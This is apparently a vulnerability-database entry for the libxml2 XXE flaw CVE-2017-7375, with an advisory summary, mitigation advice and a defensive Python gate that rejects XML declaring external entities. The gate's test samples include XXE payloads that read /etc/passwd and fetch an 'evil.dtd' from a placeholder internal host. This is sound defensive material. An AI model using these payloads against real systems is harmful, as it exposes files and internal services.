CVE-2017-7375
Description
libxml2 flaw allows remote XML External Entity (XXE) inclusion even with default parser flags, exposing local files or internal servers.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
CVE-2017-7375 is a flaw in libxml2 [2] in which the parser resolves external entities even when the caller has not requested entity substitution, DTD validation, loading of the external DTD subset, or default DTD attributes [1]. Gentoo reports every version before 2.9.4-r3 as affected [2]. The consequence is that XML External Entity (XXE) injection works under the default parser flags, which are normally expected to prevent it [1]; an application that relied on those defaults instead of an explicit entity policy is therefore exposed without any misconfiguration on its part.
Exploitation
An attacker must supply a specially crafted XML document [2] and have it parsed by an application that uses libxml2 with its default flags [1]. No authentication or privileged network position is required beyond getting the document to the parser, which in practice means any input path that accepts XML: uploads, API request bodies, configuration files, feeds. The document carries a DOCTYPE declaration declaring an external entity whose system identifier points at a local file or at an HTTP or FTP URL; when the entity is referenced in the body, the vulnerable parser fetches that resource and substitutes its contents [1].
Impact
Successful exploitation discloses the contents of local files readable by the parsing process, or lets the attacker interact with internal HTTP or FTP servers that are otherwise unreachable from outside [1], which can leak sensitive data, credentials, or details of internal services. The Gentoo advisory, which covers several libxml2 issues at once, also lists arbitrary code execution and denial of service among the possible outcomes [2]. Whatever is gained is gained with the privileges of the application that embeds libxml2.
Mitigation
Upgrade libxml2. Gentoo shipped the fix in 2.9.4-r3 (GLSA 201711-01, 2017-11-01) [2], Debian in DSA-3952, and the Android security bulletin of June 2017 includes the corresponding commit [1]; the SUSE package ranges listed under Affected products give the fixed builds for SUSE Linux Enterprise 11 SP4. The advisories list no workaround [2], so unpatched systems should update promptly. Independently of this CVE, code that parses untrusted XML should not depend on default flags for safety: pass XML_PARSE_NONET to block network fetches, install an entity loader with xmlSetExternalEntityLoader that refuses resources the application does not expect, or reject any document carrying a DOCTYPE before it reaches the parser.
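The payload shape described under Exploitation, and the pre-parse rejection suggested as defense in depth under Mitigation, as one worked example. This is added code, not libxml2 project code and not taken from the advisories; the sample documents (a file:/// general entity, a parameter entity pulling a remote DTD, a remote external subset, and two harmless documents) are constructed for illustration, and the 10.0.0.5 host is a placeholder. The check runs before any XML parser sees the bytes, so it works whether or not the libxml2 underneath is patched.

```python
"""Pre-parse gate for untrusted XML: flag DOCTYPE external references.

Added example (not libxml2 code). Refuses a document that declares external
entities or an external DTD subset before it reaches a parser that may
resolve them under default flags (CVE-2017-7375). Samples are constructed.
"""
import re
from typing import List, Optional, Tuple

# Constructed sample documents.
XXE_LOCAL_FILE = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>"""

XXE_REMOTE_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % remote SYSTEM "http://10.0.0.5/evil.dtd">
  %remote;
]>
<data>x</data>"""

XXE_EXTERNAL_SUBSET = b'<!DOCTYPE data SYSTEM "http://10.0.0.5/evil.dtd"><data>x</data>'

BENIGN_INTERNAL_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE note [ <!ENTITY author "A. Person"> ]>
<note>&author;</note>"""

BENIGN_NO_DTD = b"<data>hello</data>"

# <!ENTITY [%] name SYSTEM "uri"  or  <!ENTITY [%] name PUBLIC "pubid" "uri"
# group 1: parameter-entity marker, 2: keyword, 3 and 4: quoted literals.
_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?[^\s%]+\s+(SYSTEM|PUBLIC)\s+'
    r'("[^"]*"|\'[^\']*\')(?:\s+("[^"]*"|\'[^\']*\'))?'
)
# <!DOCTYPE name SYSTEM "uri" ... (external subset); same group layout from 2.
_DOCTYPE_RE = re.compile(
    r'<!DOCTYPE\s+([^\s\[>]+)\s+(SYSTEM|PUBLIC)\s+'
    r'("[^"]*"|\'[^\']*\')(?:\s+("[^"]*"|\'[^\']*\'))?'
)


def _decode(raw: bytes) -> str:
    # A byte search for "<!DOCTYPE" misses UTF-16 input, so decode first.
    # BOM sniffing only; full XML encoding detection is out of scope here.
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8", errors="replace")


def _doctype_span(doc: str) -> Optional[Tuple[int, int]]:
    """Locate the DOCTYPE declaration, honouring quotes and the [...] subset."""
    start = doc.find("<!DOCTYPE")
    if start < 0:
        return None
    depth, quote = 0, None
    for i in range(start + len("<!DOCTYPE"), len(doc)):
        c = doc[i]
        if quote:
            if c == quote:
                quote = None
        elif c in "\"'":
            quote = c
        elif c == "[":
            depth += 1
        elif c == "]":
            depth -= 1
        elif c == ">" and depth == 0:
            return start, i + 1
    return start, len(doc)  # unterminated DOCTYPE: treat the rest as DTD


def _uri(m) -> str:
    # SYSTEM takes one literal; PUBLIC takes a public id and then the URI.
    lit = m.group(4) if (m.group(2) == "PUBLIC" and m.group(4)) else m.group(3)
    return lit[1:-1]


def external_references(raw: bytes) -> List[Tuple[str, str]]:
    """Return (kind, uri) for each external reference in the DOCTYPE.

    kind is "doctype", "general-entity" or "parameter-entity". An empty
    list means no DOCTYPE, or a DOCTYPE with internal entities only.
    """
    doc = _decode(raw)
    span = _doctype_span(doc)
    if span is None:
        return []
    dtd = doc[span[0]:span[1]]
    found = []
    m = _DOCTYPE_RE.match(dtd)
    if m:
        found.append(("doctype", _uri(m)))
    for m in _ENTITY_RE.finditer(dtd):
        kind = "parameter-entity" if m.group(1) else "general-entity"
        found.append((kind, _uri(m)))
    return found


def is_safe_to_parse(raw: bytes, allow_internal_dtd: bool = True) -> bool:
    """Policy gate. allow_internal_dtd=False rejects any DOCTYPE at all,
    the simplest and strictest policy for inputs that never need a DTD."""
    if not allow_internal_dtd and "<!DOCTYPE" in _decode(raw):
        return False
    return not external_references(raw)


if __name__ == "__main__":
    for name, doc in [("local file", XXE_LOCAL_FILE), ("remote DTD", XXE_REMOTE_DTD),
                      ("external subset", XXE_EXTERNAL_SUBSET),
                      ("internal DTD", BENIGN_INTERNAL_DTD), ("no DTD", BENIGN_NO_DTD)]:
        print(name, is_safe_to_parse(doc), external_references(doc))
```

The scanner deliberately errs on the side of rejection: it matches on the first `<!DOCTYPE` anywhere in the document and on any `SYSTEM`/`PUBLIC` entity declaration, including unparsed (NDATA) entities, because a false rejection costs one request while a missed entity costs the file system. Where the input format never legitimately needs a DTD, call it with `allow_internal_dtd=False` and drop the whole declaration class.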
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
5 package ranges (OSV coordinates, no CPE):
- pkg:rpm/suse/libxml2&distro=SUSE%20Linux%20Enterprise%20Server%2011%20SP4, range: < 2.7.6-0.76.1
- pkg:rpm/suse/libxml2&distro=SUSE%20Linux%20Enterprise%20Server%20for%20SAP%20Applications%2011%20SP4, range: < 2.7.6-0.76.1
- pkg:rpm/suse/libxml2&distro=SUSE%20Linux%20Enterprise%20Software%20Development%20Kit%2011%20SP4, range: < 2.7.6-0.76.1
- pkg:rpm/suse/libxml2-python&distro=SUSE%20Linux%20Enterprise%20Server%2011%20SP4, range: < 2.7.6-0.76.4
- pkg:rpm/suse/libxml2-python&distro=SUSE%20Linux%20Enterprise%20Server%20for%20SAP%20Applications%2011%20SP4, range: < 2.7.6-0.76.4
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- security.gentoo.org/glsa/201711-01 (vendor advisory, Gentoo GLSA 201711-01)
- www.debian.org/security/2017/dsa-3952 (vendor advisory, Debian DSA-3952)
- www.securityfocus.com/bid/98877 (vulnerability database entry, BID 98877)
- www.securitytracker.com/id/1038623 (vulnerability database entry, SecurityTracker 1038623)
- android.googlesource.com/platform/external/libxml2/+/308396a55280f69ad4112d4f9892f4cbeff042aa (fix commit, Android libxml2)
- bugzilla.redhat.com/show_bug.cgi (Red Hat Bugzilla)
- git.gnome.org/browse/libxml2/commit/ (upstream libxml2 commit)
- source.android.com/security/bulletin/2017-06-01 (Android security bulletin, June 2017)
News mentions
No linked articles in our index yet.